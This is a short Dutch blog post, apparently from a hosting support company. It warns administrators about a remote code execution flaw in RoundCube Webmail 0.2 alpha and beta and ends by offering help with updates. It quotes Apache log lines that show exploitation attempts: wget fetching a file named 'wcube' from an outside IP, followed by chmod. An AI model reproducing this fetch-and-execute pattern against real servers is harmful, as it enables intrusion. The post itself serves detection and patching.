Roundcube 0.2-1.alpha and 0.2-3.beta Exploit
Posted on | January 19, 2009 |
Het is weer zover: er is een belangrijk beveiligingslek gevonden in roundcube 0.2-1.alpha en 0.2-3.beta. Veel hostingproviders met een standaard DirectAdmin installatie hebben er meteen last van.
Officiele melding: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-561
html2text.php in RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta allows remote attackers to execute arbitrary code via crafted input that is processed by the preg_replace function with the eval switch.
Hoewel al een tijdje geleden opgelost door een fix, blijkt deze nog bij veel providers niet geinstalleerd. Bent U een serverbeheerder en herkent u onderstaande meldingen in uw apache foutlog?:
-00:55:50– http://85.214.64.225/wcube
=> `wcube’
Connecting to 85.214.64.225:80… connected.
HTTP request sent, awaiting response… –00:55:50– http://85.214.64.225/wcube
=> `wcube’
Connecting to 85.214.64.225:80… 404 Not Found
00:55:50 ERROR 404: Not Found.
chmod: cannot access `wcube’: No such file or directory
connected.
HTTP request sent, awaiting response… 404 Not Found
00:55:50 ERROR 404: Not Found.
chmod: cannot access `wcube’: No such file or directory
–05:04:12– http://85.214.64.225/wcube
=> `wcube’
Connecting to 85.214.64.225:80… connected.
HTTP request sent, awaiting response… 404 Not Found
05:04:12 ERROR 404: Not Found.
chmod: cannot access `wcube’: No such file or directory
Update dan zo snel mogelijk uw installaties, of neem, indien u niet weet hoe, contact met ons op. Wij lossen het direct voor u op!